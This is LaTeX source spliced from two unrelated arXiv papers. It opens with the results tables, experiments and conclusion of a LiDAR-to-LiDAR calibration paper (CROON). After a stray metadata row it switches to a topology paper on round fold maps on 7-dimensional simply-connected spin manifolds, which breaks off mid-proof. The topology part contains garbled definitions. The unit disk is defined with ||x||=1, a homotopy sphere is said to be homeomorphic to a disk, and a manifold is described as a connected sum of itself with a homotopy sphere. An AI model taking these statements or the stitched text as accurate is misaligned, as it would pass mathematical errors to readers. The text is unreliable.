\multicolumn{2}{c}{} & \textbf{pitch} & \textbf{roll} & \textbf{yaw} & \textbf{x} & \textbf{y} & \textbf{z} \\ \hline
\multirow{2}{*}{front LiDAR} & \textbf{mean} & -0.0111 & -0.0124 & 0.0049 & 0.0028 & -0.0005 & -0.0013 \\ \cline{2-8}
& \textbf{std} & 0.0407 & 0.0310 & 0.0875 & 0.0363 & 0.0075 & 0.0030 \\ \hline
\multirow{2}{*}{back LiDAR} & \textbf{mean} & -0.0108 & 0.0163 & -0.0234 & -0.0163 & -0.0007 & -0.0010 \\ \cline{2-8}
& \textbf{std} & 0.0266 & 0.0363 & 0.1451 & 0.1070 & 0.0149 & 0.0037 \\ \hline
\multirow{2}{*}{left LiDAR} & \textbf{mean} & -0.0220 & -0.00004 & 0.0029 & -0.0033 & -0.0005 & -0.0014 \\ \cline{2-8}
& \textbf{std} & 0.0290 & 0.0106 & 0.0760 & 0.0460 & 0.0114 & 0.0022 \\ \hline
\multirow{2}{*}{right LiDAR} & \textbf{mean} & 0.0105 & 0.0087 & 0.0133 & -0.0003 & 0.0020 & 0.0011 \\ \cline{2-8}
& \textbf{std} & 0.0291 & 0.0293 & 0.0747 & 0.0446 & 0.0075 & 0.0075 \\ \hline
\end{tabular}
\label{unreal world statistic results}
\end{table*}
Because there is no ground truth data for the real data set, we thus only qualitatively evaluate the results. Compared with real data, simulated data has ground truth, and the method can be tested completely through quantitative and qualitative analysis.
\subsection{Realistic Experiment}
In this section, we first collect real-world point cloud data in several different road scenes in our city. It should be noted that the LiDARs have an initial configuration angle and position offset. We add a random deviation to LiDARs, including $\pm 45\degree$ in $pitch, roll, yaw$, and $\pm 10cm $ in $x, y, z$. After adding the artificial deviation and continuous measurement in one scene, we can evaluate its consistency and accuracy. Furthermore, the results of different scenes can show its robustness and stability.
\subsubsection{Qualitative Results}
Our method consists of two stages, rough calibration and refinement calibration. The last two rows of Fig.\ref{aligned data} show the different period point clouds in real scene. The third row of Fig.\ref{aligned data} is the top view, and the fourth row of Fig.\ref{aligned data} is the left view. Columns of (a)-(d) in Fig.\ref{aligned data} represent the initial pose, ground plane calibration, rough calibration, and refine calibration, respectively. Point clouds from three different LIDARs have a large initial deviation in column (a). After ground plane calibration, three point clouds calibrate their non-ground points in rough calibration and refine calibration in column (c) and (d) where the pose of the three point clouds are quite accurate.
\begin{table*}[]
\centering
\setlength{\tabcolsep}{5mm}
\caption{Compare results with other two targetless method, CROON achieves good results in 6 degrees of freedom.}{
\begin{tabular}{ccllcccc}
\hline
\multirow{2}{*}{Method} & \multirow{2}{*}{scene} & \multicolumn{3}{c}{Rotation{[}deg{]}} & \multicolumn{3}{c}{Translation{[}m{]}} \\ \cline{3-8}
& & pitch & roll & yaw & x & y & z \\ \hline
\multirow{3}{*}{\begin{tabular}[c]{@{}c@{}}Single \\ Planar \\ Board\cite{RN20}\end{tabular}} & config1 & -0.0264 & -1.0449 & -0.3068 & 0.0094 & -0.0098 & 0.0314 \\ \cline{2-8}
& config2 & 0.1587 & -0.3132 & -0.7868 & \textbf{0.0026} & \textbf{0.0029} & \textbf{-0.0105} \\ \cline{2-8}
& config3 & 1.023 & -0.0902 & 0.1441 & \textbf{-0.0011} & -0.0033 & -0.0162 \\ \hline
\multirow{2}{*}{\begin{tabular}[c]{@{}c@{}}Planar \\ Surfaces\cite{RN18}\end{tabular}} & config1 & \textbf{-0.0097} & \textbf{-0.0084} & -0.0149 & -0.0407 & 0.0358 & 0.0416 \\ \cline{2-8}
& config2 & 0.0172 & 0.0165 & \textbf{-0.0017} & 0.0541 & 0.0123 & 0.0632 \\ \hline
CROON & all & \textbf{-0.0083} & \textbf{0.0031} & \multicolumn{1}{l}{\textbf{-0.0006}} & \multicolumn{1}{l}{-0.0043} & \multicolumn{1}{l}{\textbf{0.0001}} & \multicolumn{1}{l}{\textbf{-0.0006}} \\ \hline
\end{tabular}
}
\label{compare results}
\end{table*}
\subsubsection{Calibration Consistency Evaluation}
We test our method in ten different scenes where 250 groups of different initial values are used in each scene. In Fig.\ref{plotbox of real scene}, the $x$-axis represents the different road scenes, and the $y$-axis represents the mean and standard deviation of 6 degrees of freedom. In each scene, the means of different rounds of measurement are close to each other, which demonstrates the consistency and accuracy of our method. More essentially, all the standard deviation in different scenes are close to 0, which shows the robustness and stability of our method. It is worth mention that our method can get excellent results in $z$ translation calibration due to utilizing the characteristic of road scenes.
\subsection{Simulated Experiment}
We can get accurate ground truth data in the simulated engine by controlling the other influence factors compared with real-world data. In the simulated experiment, we first collect simulated point cloud data in different road scenes in the Carla engine. We collect the data while the virtual car automatically running, and we can directly consider that all LiDARs are time synchronization. The unreal world data set totally includes 1899 frames of point clouds. The simulated experiment results are mainly used for quantitative analysis to demonstrate the robustness, stability, and accuracy of our method again.
\subsubsection{Quantitative Experiments}
Similar to the experiments of the real-world data set, We randomly initialize the parameters and then calculate the means and standard deviations of all results. our method can calibrate more than 1798(94.7\%) road scenes successfully and Table.\ref{unreal world statistic results} shows the quantitative results. Although the error of unreal world data set is small enough, CROON performs better in real world data set because everything in real world has defects errors which can be regarded as characteristics in registration. There are some failure cases in Fig.\ref{simulated data set bad case}.
\begin{figure}[ht]
\centering
\includegraphics[scale=0.12]{figures/bad_case_v2.png}
\caption{Bad case. (a) All around is the same in the scene, (b) There is a truck in the right of the car to block the right lidar.}
\label{simulated data set bad case}
\end{figure}
\subsubsection{Comparison Experiments}
We compare our methods with \cite{RN18} and \cite{RN20}, which all perform automatic calibration methods and use prior information as little as possible. Table.\ref{compare results} shows the quantitative comparison of three methods. Our method can get the best results in $angle_{pitch}, angle_{roll}, angle_{yaw}, y, z$. It should be pointed out that our method has two other advantages:1) our method performs well under thousands of groups of significant random initial extrinsic error and different road scenes; 2)Our method performs better in real world due to there are more disordered targets, irregular lines and surfaces in real road scenes.
\section{CONCLUSIONS}
In this paper, we propose CROON,a LiDAR-to-LiDAR automatic extrinsic parameters calibration method in road scene to find a set of stunning precision transformations between front, back, left, right LiDARs and top LiDAR. The method is a rough-to-fine framework to calibrate from an arbitrary initial pose accurately. Meanwhile, because of more geometric constraints from the raw data and the characteristic of the road scene, our method could fast calculate the result independently. More essentially, all the source code and data, including real scenes and simulated scenes in this paper, are available to benefit the community.
\bibliographystyle{IEEEtran}
| 2024-02-18T23:40:18.797Z | 2022-03-08T02:34:55.000Z | algebraic_stack_train_0000 | 2,025 | 5,693 |
|
proofpile-arXiv_065-9987 | \section{Introduction, terminologies and notation.}
\label{sec:1}
\subsection{Smooth maps and fold maps.}
{\it Fold} maps are higher dimensional versions of Morse functions and fundamental tools in the present paper and in an area which we can regard as a higher dimensional version of the theory of Morse functions and its applications to algebraic topology and differential topology.
A {\it singular} point of a differentiable map is a point in the domain at which the dimension of the image of the differential is smaller than both the dimensions of the domain and the target. The set of all the singular points the {\it singular set} of the map. The image of the singular set is the {\it singular value set} of the map. The {\it regular value set} of the map is the complementary set of the singular value set of the map. A {\it singular {\rm (}regular{\rm )} value} means a point in the singular (resp. regular) value set.
Throughout the present paper, manifolds, maps between them, (boundary) connected sums of manifolds, and other fundamental notions are considered in the smooth category (in the class $C^{\infty}$) unless otherwise stated.
For a smooth map $c$, $S(c)$ denotes the singular set of $c$.
\begin{Def}
\label{def:1}
Let $m \geq n \geq 1$ be integers.
A smooth map from an $m$-dimensional smooth manifold with no boundary into an $n$-dimensional smooth manifold with no boundary is said to be a {\it fold} map if at each singular point $p$, it has the form
$$(x_1, \cdots, x_m) \mapsto (x_1,\cdots,x_{n-1},\sum_{k=n}^{m}{x_k}^2)$$
for suitable coordinates and a suitable integer satisfying $0 \leq i(p) \leq \frac{m-n+1}{2}$.
\end{Def}
\begin{Prop}
\label{prop:1}
For a fold map $f$ in Definition \ref{def:1}, $S(f)$ is an {\rm (}$n-1${\rm )}-dimensional closed and smooth submanifold with no boundary, $f {\mid}_{S(f)}$ is an immersion and $i(p)$ is unique for any $p \in S(f)$.
\end{Prop}
We call $i(p)$ the {\it index} of $p$ there.
\begin{Def}
\label{def:2}
A fold map is said to be {\it special generic} if the index $i(p)$ is always $0$ for any singular point $p$.
\end{Def}
\subsection{Some classes of 7-dimensional closed and simply-connected manifolds.}
${\mathbb{R}}^k$ denotes the $k$-dimensional Euclidean space.
For a point $x \in {\mathbb{R}}^n$, $||x||$ denotes the distance between $x$ and the origin $0$ where the underlying metric is the standard Euclidean metric: it also denotes the value of the Euclidean norm at the vector $x \in {\mathbb{R}}^n$.
$S^k:=\{x \in {\mathbb{R}}^{k+1}\mid ||x||=1.\}$ denotes the $k$-dimensional unit sphere and $D^k:=\{x \in {\mathbb{R}}^{k}\mid ||x||=1.\}$ denotes the $k$-dimensional unit disk. ${\mathbb{C}P}^k$ denotes the $k$-dimensional complex projective space, which is a $k$-dimensional closed and simply-connected complex manifold.
A {\it homotopy} sphere means a smooth manifold homeomorphic to a unit disk. It is said to be {\it exotic} if it is not diffeomorphic to any unit sphere. If it is diffeomorphic to a $k$-dimensional unit sphere, then it is a $k$-dimensional {\it standard} sphere.
$7$-dimensional closed and simply-connected manifolds are important objects in the theory of classical algebraic topology and differential topology (of higher dimensional closed and simply-connected manifolds).
\begin{itemize}
\item There exist exactly $28$ types of $7$-dimensional oriented homotopy spheres. See \cite{milnor}, which is a pioneering work, and see also \cite{eellskuiper} for example.
\item (\cite{crowleyescher}, \cite{crowleynordstrom}, and so on.)
$7$-dimensional closed and $2$-connected manifolds are classified via concrete algebraic topological theory.
\item (\cite{kreck}.) The previous classification is extended to one for the class of $7$-dimensional closed and simply-connected manifolds whose 2nd integral homology groups are free.
\item(\cite{wang}.) There exists a one-to-one correspondence between the topologies of $7$-dimensional, closed, simply-connected and spin manifolds whose integral cohomology rings are isomorphic to that of ${\mathbb{C}P}^2 \times S^3$ and 2nd integral cohomology classes which are divisible by $4$. A closed and oriented manifold $X$ having such a topology is represented as a connected sum of $X$ and a $7$-dimensional oriented homotopy sphere $\Sigma$. Furthermore, between two of these manifolds, there exists an orientation-preserving diffeomorphism if and only if between the oriented homotopy spheres appearing in the definition, there exists an orientation-preserving diffeomorphism.
\end{itemize}
\subsection{Fold maps on $7$-dimensional closed and simply-connected manifolds and a main theorem.}
The class of special generic maps contains Morse functions with exactly two singular points on homotopy spheres, playing important roles in so-called Reeb's theorem and canonical projections of unit spheres, for example. Related to this and more general fundamental theory of Morse functions and decompositions of the manifolds into {\it handles} associated with the functions, see \cite{milnor2} for example.
Proving that canonical projections of unit spheres are fold maps and special generic is, exercises on fundamental theory of differentiable manifolds and maps and Morse functions.
\begin{Thm}[\cite{calabi}, \cite{saeki}, \cite{saeki2}, \cite{wrazidlo} and so on.]
\label{thm:1}
$7$-dimensional {\it exotic} homotopy spheres admit no special generic maps into ${\mathbb{R}}^n$ for $n=4,5,6$. Oriented exotic homotopy spheres of 14 types admit no special generic maps for $n=3$.
\end{Thm}
A bundle whose fiber is a (smooth) manifold is assumed to be {\it smooth} unless otherwise stated. A {\it smooth} bundle is a bundle whose structure group is a subgroup of the diffeomorphism group: the {\it diffeomorphism group} of a (smooth) manifold is the group of all diffeomorphisms (of course the diffeomorphisms are assumed to be smooth).
\begin{Thm}[\cite{kitazawa2}]
\label{thm:2}
Every $7$-dimensional homotopy sphere admits a fold map into ${\mathbb{R}}^4$ such that $f {\mid}_{S(f)}$ is an embedding and that $f(S(f))=\{x \mid ||x||=1,2,3.\}$. Furthermore, we have the following three.
\begin{enumerate}
\item We can obtain this map $f$ so that for any connected component $C \subset f(S(f))$, there exists a small closed tubular neighborhood $N(C)$ so that the composition of $f {\mid}_{f^{-1}(N(C))}:f^{-1}(N(C)) \rightarrow N(C)$ with the canonical projection to $C$ gives a trivial smooth bundle.
\item In the previous statement, we can replace $f(S(f))=\{x \mid ||x||=1,2,3.\}$ by $f(S(f))=\{x \mid ||x||=1.\}$ if and only if the homotopy sphere is diffeomorphic to the unit sphere.
\item As the previous statement, we can replace $f(S(f))=\{x \mid ||x||=1,2,3.\}$ by $f(S(f))=\{x \mid ||x||=1,2.\}$ if and only if the homotopy sphere is represented as the total space of a smooth bundle over $S^4$ whose fiber is diffeomorphic to $S^3$. There exist exactly $16$ types of $7$-dimensional oriented homotopy spheres satisfying this property by virtue of \cite{eellskuiper}.
\end{enumerate}
\end{Thm}
\begin{Thm}[\cite{kitazawa8}]
\label{thm:3}
Every $7$-dimensional manifold of \cite{wang}, presented in the previous subsection, admits a fold map into ${\mathbb{R}}^4$ such that $f {\mid}_{S(f)}$ is an embedding and that $f(S(f))=\{x \mid 1 \leq ||x|| \in \mathbb{N} \leq l\}$ for a suitable integer $3 \leq l \leq 5$.
\end{Thm}
Hereafter, $\mathbb{N}$ denotes the set of all positive integers.
\begin{MainThm}
Let $l_0>0$ be an integer. Let $\{l_j\}_{j=1}^{l_0}$ and $\{k_j\}_{j=1}^{l_0}$ be sequences of integers of length $l_0$. Let ${l_0}^{\prime} \leq l_0$ be a positive integer.
Let ${\Pi}_{l_0,{l_0}^{\prime}}$ be a surjection from the set $\{p \in \mathbb{N} \mid 1 \leq p \leq l_0.\}$ onto the set $\{p \in \mathbb{N} \mid 1 \leq p \leq {l_0}^{\prime}.\}$.
Then there exist a $7$-dimensional closed, oriented, simply-connected and spin manifold $M$ and a {\rm stable} fold map $f:M \rightarrow {\mathbb{R}}^4$ such that the following four properties hold.
\begin{enumerate}
\item $H_2(M;\mathbb{Z}) \cong {\mathbb{Z}}^{l_0}$ and $H_3(M;\mathbb{Z}) \cong {\mathbb{Z}}^{{l_0}^{\prime}}$.
\item For suitable bases $\{a_j\}_{j=1}^{l_0} \subset H^2(M;\mathbb{Z}) \cong {\mathbb{Z}}^{l_0}$ and $\{b_j\}_{j=1}^{{l_0}^{\prime}} \subset H^4(M;\mathbb{Z}) \cong {\mathbb{Z}}^{{l_0}^{\prime}}$, the following two properties hold.
\begin{enumerate}
\item The cup product of $a_{j_1}$ and $a_{j_2}$ always vanishes for distinct $j_1$ and $j_2$.
\item The square of $a_j$ is $l_j b_{{\Pi}_{l_0,{l_0}^{\prime}}(j)}$.
\end{enumerate}
\item The 1st Pontryagin class of $M$ is ${\Sigma}_{j=1}^{l_0} k_j b_{{\Pi}_{l_0,{l_0}^{\prime}}(j)}$.
\item Connected components of the singular set of $f$ are diffeomorphic to the $3$-dimensional unit sphere. The restriction to each connected component of the singular set of $f$ is an embedding and the preimage of a singular value contains at most $2$ singular points. In addition, connected components of preimages of regular values are always diffeomorphic to $S^3$ or $S^2 \times S^1$.
\end{enumerate}
\end{MainThm}
Different from results on explicit fold maps into ${\mathbb{R}}^4$ on $7$-dimensional, closed, simply-connected and spin manifolds in \cite{kitazawa6}, \cite{kitazawa7} and \cite{kitazawa9}, squares of 2nd integral cohomology classes in Theorem \ref{thm:3} and Main Theorem may not be divisible by $2$.
The definition of a {\it stable} fold map and a proof of Main Theorem are presented in the next section.
\section{A proof of main theorem.}
\label{sec:2}
For a smooth manifold $X$, $T_pX$ denotes the tangent vector space at $p \in X$. For a smooth map $c:X \rightarrow Y$, ${dc}_p:T_pX \rightarrow T_{c(p)} Y$ denotes the differential at $p$.
\begin{Def}
\label{def:3}
A fold map $c:X \rightarrow Y$ on a closed manifold is said to be {\it stable} if for any $y \in c(S(c))$, the following two conditions are satisfied.
\begin{enumerate}
\item $c^{-1}(y)$ is a discrete set $\{p_j\}_{j=1}^l$ consisting of exactly $l>0$ points.
\item $\dim Y=\dim {\bigcap}_{j=1}^l {dc}_{p_j}(T_{p_j}X)+{\Sigma}_{j=1}^l (\dim Y-{\rm rank}\ {dc}_{p_j})$.
\end{enumerate}
\end{Def}
Note that $\dim Y-{\rm rank}\ {dc}_{p_j}=1$ there.
For example, a fold map $f$ such that $f {\mid}_{S(f)}$ is an embedding is stable.
For this notion, for example, see also \cite{golubitskyguillemin}, which mainly explains fundamental theory and classical important theory on singularities of differentiable maps.
\begin{Def}[\cite{kitazawa}--\cite{kitazawa5}.]
\label{def:4}
Let $m \geq n \geq 2$ be integers.
A stable fold map $f:M \rightarrow {\mathbb{R}}^n$ on an $m$-dimensional closed manifold $M$ into ${\mathbb{R}}^n$ is said to be {\it round} if $f {\mid}_{S(f)}$ is an embedding and for a suitable integer $l>0$ and a suitable diffeomorphism $\phi$ on ${\mathbb{R}}^n$, $(\phi \circ f)(S(f))=\{x \mid 1 \leq ||x|| \in \mathbb{N} \leq l.\}$.
\end{Def}
This class contains canonical projections of unit spheres into the Euclidean space whose dimension is greater than $1$, stable fold maps in Theorems \ref{thm:2} and \ref{thm:3}, and so on. We can define this notion for $n=1$ and this class contains Morse functions with exactly two singular points on homotopy spheres (\cite{kitazawa5}).
A {\it linea}r bundle is a smooth bundle whose fiber is diffeomorphic to a unit sphere or a unit disk and whose structure group acts linearly on the fiber. For linear bundles, characteristic classes such as {\it Stiefel-Whitney classes}, {\it Euler classes} (for {\it oriented} linear bundles), {\it Pontryagin classes}, and so on, are defined as cohomology classes of the base spaces.
We can define these notions for smooth manifolds as those of the tangent bundles.
We do not review oriented linear bundles, these characteristic classes, or so on, precisely. See \cite{milnorstasheff} for example. See also \cite{little} for Pontryagin classes of complex projective spaces and manifolds which are homotopy equivalent to them.
For a closed manifold, a homology class is said to be {\it represented by a closed {\rm (}and oriented{\rm )} submanifold with no boundary} if it is realized as the value of the homomorphism induced by the canonical inclusion map of the submanifold at the {\it fundamental class}. The fundamental class of a closed (oriented) manifold is a generator of the top homology group of the manifold (compatible with the orientation) for a coefficient commutative group: if the group is isomorphic to $\mathbb{Z}/2\mathbb{Z}$, then we do not need to orient the manifold.
For a compact manifold $X$, let $c$ be an element of the $i$-th homology group $H_i(X;\mathbb{Z})$ such that we cannot represent as $c=rc^{\prime}$ for any $(r,c^{\prime}) \in (\mathbb{Z}-\{0,1,-1\}) \times H_i(X;\mathbb{Z})$ and that $rc \neq 0$ for any $r \in \mathbb{Z}-\{0\}$. We can define $c^{\ast} \in H^{i}(X;\mathbb{Z})$ such that $c^{\ast}(c)=1$ and that $c^{\ast}(A)=0$ for any subgroup $A \subset H_i(X;\mathbb{Z})$ giving a representation of $H_i(X;\mathbb{Z})$ as the internal direct sum of the subgroup generated by $c$ and $A$. We can define this in a unique way and call this the {\it dual} of $c$.
The following proposition extends (some of) Theorem \ref{thm:3}.
\begin{Prop}
\label{prop:2}
Let $l$ be an integer. There exists a family $\{f_{l,k}:M_{l,k} \rightarrow {\mathbb{R}}^4\}_{k \in\mathbb{Z}}$ of round fold maps on $7$-dimensional oriented, closed, simply-connected and spin manifolds satisfying the following four properties.
\begin{enumerate}
\item
\label{prop:2.1}
$H_j(M_{l,k};\mathbb{Z}) \cong \mathbb{Z}$ for $j=0, 2, 3, 4, 5, 7$.
\item
\label{prop:2.2}
For a suitable generator of $H^2(M_{l,k};\mathbb{Z}) \cong \mathbb{Z}$, the square is $l$ times a suitable generator of $H^4(M_{l,k};\mathbb{Z})$.
\item
\label{prop:2.3}
The 1st Pontryagin class of $M_{l,k}$ is $4k$ times the generator of $H^4(M_{l,k};\mathbb{Z})$ defined just before.
\item
\label{prop:2.4}
The singular value set of each round fold map consists of exactly three connected components and $\{x \in {\mathbb{R}}^4 \mid ||x||=1,2,3.\}$. Furthermore, the preimages of a point in $\{x \in {\mathbb{R}}^4 \mid ||x||<1.\}$, one in $\{x \in {\mathbb{R}}^4 \mid 1<||x||<2.\}$, and one in $\{x \in {\mathbb{R}}^4 \mid 2<||x||<3.\}$, are diffeomorphic to $S^2 \times S^1 \sqcup S^3$, $S^2 \times S^1$ and $S^3$, respectively.
\end{enumerate}
\end{Prop}
\begin{proof}
We can prove this in a similar manner to that in the proof of Theorem \ref{thm:2} in \cite{kitazawa8}.
We prove this including this original case.
There exists a linear bundle ${M^{\prime}}_l$ over $S^4$ whose fiber is diffeomorphic to $S^2$ satisfying the following two properties.
\begin{enumerate}
\item
\label{prop:2.0-1.1}
The square of a generator of the 2nd integral cohomology group of this total space is $l$ times a generator of the $4$-th integral cohomology group.
\item
\label{prop:2.0-1.2}
The 1st Pontryagin class of the total space is $4l$ times the generator before.
\end{enumerate}
For this manifold, see articles and webpages on $6$-dimensional closed and simply-connected manifolds such as \cite{jupp}, \cite{wall}, \cite{zhubr} and \cite{zhubr2} for example.
If $l=0$, then the total space is diffeomorphic to $S^2 \times S^4$ and if $l=1$, then it is diffeomorphic to the $3$-dimensional complex projective space ${\mathbb{C}P}^3$. We have a smooth bundle ${M^{\prime}}_l \times S^1$ over $S^4$ whose fiber is diffeomorphic to $S^2 \times S^1$ by the composition of the projection of a trivial bundle over ${M^{\prime}}_l$ with the projection of the linear bundle before. We remove the interior of a smoothly embedded copy of a $4$-dimensional unit disk and the preimage for the resulting projection. We can exchange this to a stable fold map such that the restriction to the singular set is an embedding, that the singular set is diffeomorphic to $S^3$, and that the preimages of regular values are $S^3$ and $S^2 \times S^1$, respectively, for the two connected components of the regular value set. Furthermore, we can do this so that the following three hold. Rigorous understandings are left to readers and similar expositions are in \cite{kitazawa8} for $l=1$.
\begin{enumerate}
\item
\label{prop:2.0-2.1}
If an arbitrary integer $k$ is given, then the domain is a $7$-dimensional oriented, closed, simply-connected and spin manifold $M_{l,k}$ and this satisfies the following properties.
\begin{enumerate}
\item
\label{prop:2.0-2.1.1}
$H_j(M_{l,k};\mathbb{Z}) \cong \mathbb{Z}$ for $j=0, 2, 3, 4, 5, 7$.
\item
\label{prop:2.0-2.1.2}
We take a 2nd integral homology class $c$ represented by $S^2 \times \{\ast\} \subset S^2 \times S^1$ in the preimage of a regular value before. For its dual, which is a cohomology class in $H^2(M_{l,k};\mathbb{Z}) \cong \mathbb{Z}$, the square is $l$ times a generator of $H^4(M_{l,k};\mathbb{Z})$, which is the dual of an integral homology class represented by a suitable closed submanifold with no boundary and also the Poincar\'e dual to a homology class represented by the preimages of regular values, which are diffeomorphic to $S^3$ or $S^2 \times S^1$.
\item
\label{prop:2.0-2.1.3}
The 1st Pontryagin class of $M_{l,k}$ is $4k$ times the generator of $H^4(M_{l,k};\mathbb{Z})$ defined just before.
\end{enumerate}
\item
\label{prop:2.0-2.2}
For the singular value set $C$, there exists a small closed tubular neighborhood $N(C)$ and the composition of the restriction to the preimage of $N(C)$ with a canonical projection to $C$ gives a trivial smooth bundle whose fiber is diffeomorphic to a manifold obtained by removing the interior of a copy of the $4$-dimensional unit disc smoothly embedded in a manifold diffeomorphic to $S^2 \times {\rm Int}\ D^2 \subset S^2 \times D^2$.
\item
\label{prop:2.0-2.3}
The index of each singular point is $2$.
\end{enumerate}
If $l=0$, then the suitable closed submanifold in the first property here can be taken as one diffeomorphic to the $4$-dimensional unit sphere.
If $l=1$, then the suitable closed submanifold in the first property here can be taken as one diffeomorphic to the complex projective plane ${\mathbb{C}P}^2$.
We construct a desired round fold map from this surjection. We can construct a trivial bundle over the subset $\{x \in {\mathbb{R}}^4 \mid ||x|| \leq \frac{1}{2}.\} \subset {\mathbb{R}}^4$
whose fiber is diffeomorphic to $S^3 \sqcup (S^2 \times S^1)$ and whose total space is the preimage of the complementary set of ${\rm Int}\ N(C) \subset S^4$.
On the preimage of $N(C)$ for the surjection, we have the product map of a suitable Morse function on a $4$-dimensional compact manifold diffeomorphic to the fiber of the trivial bundle over $C$ before and the identity map on $C$ and glue this and the previous projection in a suitable way on the boundaries. Thus we have a desired round fold map into ${\mathbb{R}}^4$. If $l=1$, then we have a (partial) proof of Theorem \ref{thm:3}.
\end{proof}
Via fundamental arguments on deformations of Morse functions and stable fold maps, we immediately have the following proposition.
\begin{Prop}
\label{prop:3}
Let $l$ be an integer. There exists a family $\{F_{l,k}:M_{l,k} \times [0,1] \rightarrow {\mathbb{R}}^4\}_{k \in\mathbb{N}}$ of smooth homotopies such that for any $t \in [0,1]$ the maps $F_{l,k,t}$ mapping $x$ to $F_{l,k}(x,t)$ are fold maps on the $7$-dimensional oriented, closed, simply-connected and spin manifolds satisfying the following four properties.
\begin{enumerate}
\item
\label{prop:3.1}
$F_{l,k,0}=f_{l,k}$.
\item
\label{prop:3.2}
The singular set $S(F_{l,k,t})$ consists of exactly three copies of the $3$-dimensional unit sphere and on each connected component it is an embedding. Furthermore, $F_{l,k,t}(S(F_{l,k,t}))=\{x \in {\mathbb{R}}^4 \mid ||x||=2,3.\} \bigcup \{x:=(x_1,x_2,x_3,x_4) \in {\mathbb{R}}^4 \mid ||x-(\frac{3}{2}t,0,0,0)||=1.\}$.
\item
\label{prop:3.3}
For each map $F_{l,k,t}$, the preimages of a point in $\{x \in {\mathbb{R}}^4 \mid ||x||<2, ||x-(\frac{3}{2}t,0,0,0)||>1.\}$, one in $\{x \in {\mathbb{R}}^4 \mid 2<||x||<3,||x-(\frac{3}{2}t,0,0,0)||>1.\}$, one in $\{x \in {\mathbb{R}}^4 \mid ||x||<2, ||x-(\frac{3}{2}t,0,0,0)||<1.\}$, and one in $\{x \in {\mathbb{R}}^4 \mid 2<||x||<3, ||x-(\frac{3}{2}t,0,0,0)||<1.\}$, are diffeomorphic to $S^2 \times S^1$, $S^3$, $(S^2 \times S^1) \sqcup S^3$ and $S^3 \sqcup S^3$, respectively.
\item
\label{prop:3.4}
Furthermore, in the previous situation, for the preimages diffeomorphic to $(S^2 \times S^1) \sqcup S^3$ and $S^3 \sqcup S^3$, the latter $S^3$'s for these two manifolds are isotopic to $S^3$ in $(S^2 \times S^1) \sqcup S^3$ of a preimage for the map $F_{l,k,0}=f_{l,k}$ where suitable identifications of preimages are considered.
\end{enumerate}
\end{Prop}
For this, see also FIGURE \ref{fig:1}.
\begin{figure}
\includegraphics[width=40mm]{20210422roundkarano.eps}
\caption{The singular value sets of $F_{l,k,0}=f_{l,k}$ and $F_{l,k,1}$ in Proposition \ref{prop:3}: descriptions of the manifolds represent preimages.}
\label{fig:1}
\end{figure}
For a compact manifold, a closed submanifold is said to be {\it proper} if the boundary of the closed submanifold is in the boundary of the compact manifold and the interior of the submanifold is in the interior of the manifold.
We prove the main theorem.
\begin{proof}[A proof of Main Theorem]
We can easily see that $F_{l,k,1}$ is a stable fold map. $P$ denotes the subset $\{x:=(x_1,x_2,x_3,x_4) \in {\mathbb{R}}^4 \mid x_1 \geq 2.25.\}$ of ${\mathbb{R}}^4$.
We take two copies of the restriction of this stable fold map $F_{l,k,1} {\mid}_{{F_{l,k,1}}^{-1}({\mathbb{R}}^4-{\rm Int}\ P)}$. This is a smooth map on the manifold obtained by removing the tubular neighborhood of a submanifold diffeomorphic to $S^3$ in $M_{l,k}$. More precisely, this submanifold can be taken as the preimage of a regular value of a round fold map in Proposition \ref{prop:2} by (the property (\ref{prop:3.4}) in) Proposition \ref{prop:3}. By gluing these copies, we have a stable fold map on a new $7$-dimensional oriented, closed, simply-connected and spin manifold $M$. We consider the following Mayer-Vietoris sequence
$$\begin{CD}
@> >> H_j(\partial {F_{l,k,1}}^{-1}({\mathbb{R}}^4-{\rm Int}\ P);\mathbb{Z}) \\
@> >> H_j( {F_{l,k,1}}^{-1}({\mathbb{R}}^4-{\rm Int}\ P);\mathbb{Z}) \oplus H_j({F_{l,k,1}}^{-1}({\mathbb{R}}^4-{\rm Int}\ P);\mathbb{Z}) \\
@> >> H_j(M;\mathbb{Z}) \\
@> >>
\end{CD}$$
and we can see that $H_j(\partial {F_{l,k,1}}^{-1}({\mathbb{R}}^4-{\rm Int}\ P);\mathbb{Z})$ is zero for $j \neq 0,3,6$, isomorphic to $\mathbb{Z}$ for $j=0,6$, and isomorphic to $\mathbb{Z} \oplus \mathbb{Z}$ for $j=3$. Furthermore, $(\partial {F_{l,k,1}}^{-1}({\mathbb{R}}^4-{\rm Int}\ P)$ is the manifold of the domain of a round fold map whose singular set consists of two connected components and for each point in each connected component of the regular value set of this round fold map, the preimage is empty, diffeomorphic to $S^3$ and $S^3 \times S^3$, respectively. The $6$-dimensional manifold is simply-connected and diffeomorphic to $S^3 \times S^3$. For these arguments, consult Theorem 4 and Example 6 of \cite{kitazawa3} and as closely related papers \cite{kitazawa} and \cite{kitazawa2}. We can easily see that ${F_{l,k,1}}^{-1}({\mathbb{R}}^4-{\rm Int}\ P)$ is diffeomorphic to $S^3 \times D^4$ by the structures of the maps.
The kernel of the homomorphism from $H_3(\partial {F_{l,k,1}}^{-1}({\mathbb{R}}^4-{\rm Int}\ P);\mathbb{Z})$ into $H_3( {F_{l,k,1}}^{-1}({\mathbb{R}}^4-{\rm Int}\ P);\mathbb{Z}) \oplus H_3({F_{l,k,1}}^{-1}({\mathbb{R}}^4-{\rm Int}\ P);\mathbb{Z})$ is isomorphic to $\mathbb{Z}$. We see this. We can take a basis of $H_3(\partial {F_{l,k,1}}^{-1}({\mathbb{R}}^4-{\rm Int}\ P);\mathbb{Z})$ so that the two elements satisfy the following by the structures of the maps and the manifolds.
\begin{enumerate}
\item One of the two elements is represented by the preimage of a regular value of the original round fold map in Proposition \ref{prop:2}.
\item The remaining element is represented by the boundary of a $4$-dimensional proper compact submanifold in ${F_{l,k,1}}^{-1}({\mathbb{R}}^4-{\rm Int}\ P)$. Furthermore, the $4$-dimensional compact submanifold can be taken as a manifold obtained by removing the interior of a copy of the $4$-dimensional unit disc smoothly embedded in the $4$-dimensional closed submanifold with no boundary in (\ref{prop:2.0-2.1.2}) in the proof of Proposition \ref{prop:2}. In addition, we can glue $4$-dimensional closed submanifolds on the boundaries and we have a new $4$-dimensional closed submanifold $S$ with no boundary in the resulting manifold $M$.
\end{enumerate}
